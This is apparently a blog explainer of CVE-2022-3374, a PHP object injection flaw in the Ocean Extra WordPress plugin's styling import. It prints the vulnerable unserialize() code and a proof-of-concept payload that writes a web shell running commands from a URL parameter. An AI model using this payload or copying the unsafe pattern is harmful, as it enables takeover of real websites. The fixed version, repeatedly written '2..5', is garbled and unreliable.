CVE-2022-3374 - Critical PHP Object Injection in Ocean Extra WordPress Plugin (Before 2..5) – Explained

If you manage or develop WordPress websites, you know how vital plugin security is. Today, we’ll take an exclusive look at CVE-2022-3374, a critical vulnerability that was discovered in the popular Ocean Extra plugin (before version 2..5). This vulnerability can potentially allow attackers to execute arbitrary code on your WordPress site, provided they can trick an admin into importing a malicious file.

What Is Ocean Extra and Why Does It Matter?

Ocean Extra is a companion plugin for the widely used OceanWP WordPress theme. It enhances WordPress site functionality by adding extra widgets, import/export features, and more. As of June 2024, the plugin has over 700,000 active installations, making any vulnerability in it a big deal.

The Short Story

In versions before 2..5, Ocean Extra allows users with high privileges (like admins) to import custom "styling" files via the Customizer tool. The problem? The plugin unserializes the content of these files without proper validation.

Here’s why this is dangerous:
unserialize() in PHP can turn arbitrary strings into PHP objects. If an attacker gets you to import a specially crafted file, and the right PHP "gadget chain" exists in your plugin/theme setup, that file could execute code or even fully compromise your website.

In the vulnerable versions, the plugin had a code path similar to this (simplified for explanation)

// In file includes/customizer-styling.php

if ( isset( $_FILES['import_customizer_styling'] ) ) {
    $file_content = file_get_contents( $_FILES['import_customizer_styling']['tmp_name'] );
    $customizer_options = unserialize( $file_content ); // DANGEROUS!
    // ...then process $customizer_options
}

The problem?
If an attacker uploads a file containing malicious serialized PHP objects, these will be loaded in context. Unless there’s tight validation (there wasn’t), that’s game over if a suitable gadget is present.

Attacker Crafts a Malicious File:

The attacker creates a .dat or similar file containing PHP serialized data that, when unserialize() is called, instantiates a dangerous object.

Lure an Admin to Import:

The attacker convinces an admin (or guesses their workflow) to import this file via the customizer styling import tool.

Plugin Loads the File:

The vulnerable code above unserializes the file contents. If your site uses plugins or themes that contain “gadget classes”, the payload gets triggered.

Result:
Attacker can perform actions such as writing files, running commands, or stealing data—anything the gadget allows.

Suppose you have a vulnerable class (FileWriter) somewhere in your stack

class FileWriter {
    public $filename;
    public $data;
    function __destruct() {
        file_put_contents($this->filename, $this->data);
    }
}

A malicious attacker could create a payload that, when unserialized, writes arbitrary data to a server file:

$a = new FileWriter();
$a->filename = '/var/www/html/backdoor.php';
$a->data = '<?php system($_GET["cmd"]); ?>';
echo serialize($a);

This would produce a string you could save as malicious.dat and upload.

Original References and Further Reading

- Ocean Extra Plugin Page
- CVE-2022-3374 NVD Entry
- Patchstack Advisory
- PHP Object Injection Explained – OWASP

Conclusion

CVE-2022-3374 is a textbook example of why PHP’s unserialize() is so dangerous, especially in CMS plugins with file import features. If you’re running Ocean Extra before 2..5, you should update now to protect your site and your visitors.

Bookmark this page or share it with anyone managing a WordPress website to help keep the web safer!


Do you have questions about this vulnerability or WordPress security in general? Drop them below and let’s discuss.

Timeline

Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 13:50:00 UTC